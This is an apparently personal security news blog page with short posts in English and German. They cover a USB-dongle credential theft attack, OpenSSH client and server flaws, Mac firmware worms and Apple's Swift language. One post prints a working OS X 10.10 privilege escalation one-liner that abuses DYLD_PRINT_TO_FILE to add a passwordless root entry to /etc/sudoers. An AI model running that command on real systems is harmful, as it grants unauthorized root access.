Sep 16 08

passwdSecurity researcher Robert Fuller discovered an attack method with which Windows and Mac user credentials can be stolen from a locked machine.
This attack is affected against actual Windows and Mac OS computers on which the user has already logged in.

The researcher used USB-based Ethernet dongles like USB Armory or Hak5 Turtle , for which he modified the firmware code to run special software that sets the plug-and-play USB device as the network gateway, DNS, and WPAD servers on the computer it’s connected to.
Find out more:

written by d45id \\ tags: , , , , , ,

Jan 16 14

sourcecodeToday OpenSSH project reported an bug in the client component of OpenSSH versions 5.4 up to 7.1.
The announced issue could allow an OpenSSH client to leak client memory to the connected SSH server including (private) key information. The vulnerability was discovered in the roaming feature of OpenSSH client which is default active.

This vulnerabilities affects the OpenSSH client on most operating systems like Linux, FreeBSD and Mac OSX. Continue reading »

written by d45id \\ tags: , , ,

Aug 15 04

DYLD_PRINT_TO_FILEOh no, only a couple of days after OS X  a privilege escalation vulnerability in OS X 10.10 was discovered a researcher at Malwarebytes spot a new adware installer that uses DYLD_PRINT_TO_FILE exploit.

What you can do?

  • wait until Apple released a security update while you get p0wned
  • install SUIDGuard – A kernel extension adding mitigations to protect SUID/SGID binaries

written by d45id \\ tags: , , , , ,

Aug 15 03

Kovah, who discovered with his partners a lot of firmware vulnerabilities in Macs  last year has now designed with Trammell Hudson, a security engineer a worm they dubbed Thunderstrike 2 that can spread between MacBooks undetected.

[The attack is] really hard to detect, it’s really hard to get rid of, and it’s really hard to protect against something that’s running inside the firmware

Find out more at BlackHat & DefCon or read an amazing article @wired

written by d45id \\ tags: , , , , , , , ,

Jul 15 23

alertSecurity expert Stefan Esser discovered a privilege escalation vulnerability in OS X 10.10. The vulnerability is found in the dynamic linker dyld.

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

OS X 10.11 pre release candidate is not vulnerable. For all the people who want to fix the problem as soon as possible a patch was published by Esser.

written by d45id \\ tags: , , , , , , , , ,

Jun 14 06

flappyswiftNich einmal ganz 24 Stunden nachdem Apple die Programmiersprache Swift vorstellte veröffentlichten die beiden Programmierer Ari Lerner und Nate Murray ihren in Swift geschriebenen Flappy Bird-Clone auf Github.

Bis Swift Programme einzug in den AppeStore erhalten wird es wohl noch bis zum offiziellen Release von iOS 8 und OS X Yosemite dauern, aber bis dahin zeigt sich aber schon welches Potenzial Swift mit sich bringt und wie vergleichbar einfach der Einstieg ist.

written by d45id \\ tags: , , , ,

Jun 14 03

Apple-swift-logoGestern stellte Apple auf ihrer Entwicklerkonferenz WWDC 2014 ihre neu entwickelte Programmiersprache Swift vor.

Bei Swift handelt es sich um eine objektorientierte Sprache und befördert Objectiv-C nun endlich auf das Abstellgleis. Apple hat sich bei der Umsetzung Mühe gegeben und viele nette Konzepte moderner Programmiersprachen wie Klassen, Vererbung, Closures, Typinferenz, Generische Typen, Namensräume und multiple Rückgabewerte umgesetzt.

Eine Beta-Version von Swift kann über das  iOS- und OS X-Developer-Programmes bezogen werden. Eine  Dokumentation steht im iBook-Store zum kostenlosen Download bereit.

written by d45id \\ tags: , , ,

Nov 13 08

puffy-sshWie heute das OpenSSH-Projekt in einem Advisory bekannt gab existiert eine Memory Corruption-Problem, welches im Prinzip zu einer aus der Ferne ausnützbaren Sicherheitslücke führen kann.
Zwar lässt sich diese Lücke anscheinend nur nach erfolgreicher Anmeldung am System ausnutzen, dennoch empfiehlt es sich den angegebenen Workaround zu implementieren bzw. auf die entsprechend gepatchte Version upzugraden.

Noch ist nicht bekannt, dass Exploits die dieses Problem ausnützen können, existieren bzw. in Verwendung sind – da der Quellcode von OpenSSH offen ist, ist jedoch davon auszugehen, dass dies sehr bald der Fall sein wird. Continue reading »

written by d45id \\ tags: , , ,